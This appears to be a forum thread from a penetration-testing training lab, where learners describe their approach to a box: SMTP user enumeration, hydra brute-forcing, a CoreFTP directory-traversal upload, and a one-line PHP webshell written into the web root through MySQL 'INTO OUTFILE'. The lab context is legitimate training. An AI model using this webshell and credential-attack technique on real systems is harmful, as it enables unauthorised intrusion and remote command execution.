This one was quite a mess. You see so many opportunities that your head is spinning in every direction. After some time, I decided for myself to use the CoreFTP HTTP server directory traversal vulnerability. Then I started trying to upload wwwolf-php-webshell with curl (overkill):
I’m stuck on how to obtain the first credentials.
I have done the following:
Enumerate FTP with anonymous, doesn’t accept.
Enumerate SMTP users with mode RCPT, and find one f****.
Tried to brute force this user on SMTP and FTP using hydra and a bunch of different password lists, including the pws.list from the module resources and rockyou.txt, for the whole time the target server is alive.
MySQL also doesn’t accept an undefined user or the anonymous concept for login.
I’ve not explored port 80 for the HTML content, because it is out of the scope of this module, even more so for an easy lab.
I’ve been on this for days, can someone help me? Thank you.
Can someone give me some advice? I have entered MySQL with the credentials f*** and the pass 9***, but within it I understand that I must upload a file. How can I do it? I need some advice, I am stuck.
Hi. I found the credentials and was able to insert a PHP shell using MySQL: SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php';
I am trying to access the file in the browser using the parameter https://10.129.196.82/webshell.php?c=dir, but nothing happens. Could someone help me?